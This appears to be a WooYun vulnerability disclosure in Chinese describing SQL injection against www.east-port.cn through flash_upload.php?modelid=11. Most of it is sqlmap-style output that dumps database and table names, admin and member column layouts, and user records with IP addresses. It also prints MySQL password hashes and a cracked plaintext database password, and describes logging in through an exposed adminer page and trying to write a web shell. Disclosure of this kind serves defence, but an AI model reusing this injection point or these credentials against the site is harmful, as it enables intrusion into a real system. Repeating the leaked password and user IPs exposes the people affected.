WooYun.org

PS（大神们挖大洞，小菜只能挖小洞低级别的了）
厂商域名：www.east-port.cn
截图：

首先看看未授权访问目录及页面漏洞：

无意中看到了这个：

嘿嘿。。。目测有注入啦！
注入点URL:http://www.east-port.cn/flash_upload.php?modelid=11
赶紧试一试！
补充参数modelid后测试下：

web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[10:33:11] [INFO] fetching database names
[10:33:11] [INFO] the SQL query used returns 4 entries
[10:33:11] [INFO] resumed: information_schema
[10:33:11] [INFO] resumed: bak
[10:33:11] [INFO] resumed: mysql
[10:33:11] [INFO] resumed: tianwen_haiguan
[10:33:11] [DEBUG] performed 0 queries in 0.22 seconds
available databases [4]:
[*] bak
[*] information_schema
[*] mysql
[*] tianwen_haiguan
数据库出来了!!
当前数据库是： tianwen_haiguan
下面是注入出来的信息：
Database: tianwen_haiguan
[115 tables]
+-------------------------+
| wip_admin |
| wip_admin_role |
| wip_admin_role_priv |
| wip_ads |
| wip_ads_1104 |
| wip_ads_place |
| wip_ads_stat |
| wip_announce |
| wip_area |
| wip_ask |
| wip_ask_actor |
| wip_ask_credit |
| wip_ask_posts |
| wip_ask_vote |
| wip_attachment |
| wip_author |
| wip_block |
| wip_c_down |
| wip_c_info |
| wip_c_ku6video |
| wip_c_news |
| wip_c_picture |
| wip_c_product |
| wip_c_video |
| wip_cache_count |
| wip_category |
| wip_collect |
| wip_comment |
| wip_content |
| wip_content_count |
| wip_content_position |
| wip_content_tag |
| wip_copyfrom |
| wip_datasource |
| wip_digg |
| wip_digg_log |
| wip_editor_data |
| wip_error_report |
| wip_formguide |
| wip_formguide_fields |
| wip_guestbook |
| wip_hits |
| wip_ipbanned |
| wip_keylink |
| wip_keyword |
| wip_link |
| wip_linkage |
| wip_log |
| wip_mail |
| wip_mail_email |
| wip_mail_email_type |
| wip_member |
| wip_member_cache |
| wip_member_company |
| wip_member_detail |
| wip_member_group |
| wip_member_group_extend |
| wip_member_group_priv |
| wip_member_info |
| wip_menu |
| wip_message |
| wip_model |
| wip_model_field |
| wip_module |
| wip_mood |
| wip_mood_data |
| wip_order |
| wip_order_deliver |
| wip_order_log |
| wip_pay_card |
| wip_pay_exchange |
| wip_pay_payment |
| wip_pay_pointcard_type |
| wip_pay_stat |
| wip_pay_user_account |
| wip_player |
| wip_position |
| wip_process |
| wip_process_status |
| wip_role |
| wip_search |
| wip_search_type |
| wip_session |
| wip_space |
| wip_space_api |
| wip_special |
| wip_special_content |
| wip_spider_job |
| wip_spider_sites |
| wip_spider_urls |
| wip_status |
| wip_times |
| wip_type |
| wip_urlrule |
| wip_video |
| wip_video_count |
| wip_video_data |
| wip_video_position |
| wip_video_special |
| wip_video_special_list |
| wip_video_tag |
| wip_vote_data |
| wip_vote_option |
| wip_vote_subject |
| wip_vote_useroption |
| wip_workflow |
| wip_yp_apply |
| wip_yp_buy |
| wip_yp_cert |
| wip_yp_collect |
| wip_yp_count |
| wip_yp_guestbook |
| wip_yp_job |
| wip_yp_news |
| wip_yp_product |
+-------------------------+
Database: tianwen_haiguan
Table: wip_admin
[6 columns]
+-----------------------+-----------------------+
| Column | Type |
+-----------------------+-----------------------+
| alloweditpassword | tinyint(1) unsigned |
| allowmultilogin | tinyint(1) unsigned |
| disabled | tinyint(1) unsigned |
| editpasswordnextlogin | tinyint(1) unsigned |
| userid | mediumint(8) unsigned |
| username | char(20) |
+-----------------------+-----------------------+
Database: tianwen_haiguan
Table: wip_member_info
[10 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| answer | char(32) |
| avatar | int(10) unsigned |
| lastloginip | char(15) |
| lastlogintime | int(10) unsigned |
| logintimes | smallint(5) unsigned |
| note | char(255) |
| question | char(50) |
| regip | char(15) |
| regtime | int(10) unsigned |
| userid | mediumint(8) unsigned |
+---------------+-----------------------+
Table: wip_member_info
[5 entries]
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
| userid | note | regip | avatar | answer
| regtime | question | logintimes | lastloginip | lastlogintime |
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
| 1 | <blank> | 127.0.0.1 | 0 | <blank>
| 1302339634 | <blank> | 522 | 172.17.128.250 | 1396395676 |
| 2 | <blank> | 127.0.0.1 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1313657440 | <blank> | 3 | 127.0.0.1 | 1313658948 |
| 3 | <blank> | 125.34.15.81 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1314004642 | <blank> | 315 | 172.17.128.250 | 1404275154 |
| 4 | <blank> | 123.116.33.241 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1314260333 | <blank> | 1 | 123.116.33.241 | 1314260395 |
| 6 | <blank> | 172.17.128.250 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1352246083 | <blank> | 12 | 172.17.128.250 | 1361231995 |
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
mysql数据库密码：
mysql:
Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password |
+-------------------------------------------+
| *3EA0E6E2CCA03AFEE10B8B1B0A2E4EB674D189D4 |
| *3EA0E6E2CCA03AFEE10B8B1B0A2E4EB674D189D4 |
+-------------------------------------------+
花了1毛钱买了hash得到密码：system808
我正担心mysql不能外联呢，正好，在站点页面里翻到了一个adminer.php页面。于是：

尝试拿shell时：
查询出错: Can't create/write to file '/var/www/html/cf_hb.php' (Errcode: 13)
小菜不善提权，就做到这一步了！